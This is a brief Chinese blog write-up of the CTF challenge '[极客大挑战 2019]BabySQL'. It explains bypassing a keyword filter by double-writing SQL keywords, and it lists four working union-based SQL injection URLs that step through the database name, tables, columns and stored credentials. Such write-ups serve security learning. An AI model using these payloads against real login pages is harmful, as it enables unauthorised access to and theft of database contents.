178 次阅读 web安全笔记 2020-06-07
[极客大挑战 2019]BabySQL writeup
(0)

这题界面和上一题easysql没多大区别,他说做了很多过滤

使用burpsuite fuzz一下

可以看出有很多词被过滤了
尝试双写注入
首先order by 得到有三列
然后爆数据库名

/check.php?username=1' uniunionon selselectect 1,2,database()%23&password=123

爆表名

/check.php?username=1' uniunionon selselectect 1,2,group_concat(table_name) ffromrom infoorrmation_schema.tables whwhereere table_schema=database()%23&password=123

爆字段

/check.php?username=1' uniunionon selselectect 1,2,group_concat(column_name) ffromrom infoorrmation_schema.columns whwhereere table_schema=database() anandd table_name='b4bsql'%23&password=123

爆数据

/check.php?username=1' uniunionon selselectect 1,2,group_concat(id,username,password) ffromrom b4bsql%23&password=123

得到flag

sql
本文为作者silent666发布,未经允许禁止转载!
上一篇 下一篇
评论
暂无评论 >_<
加入评论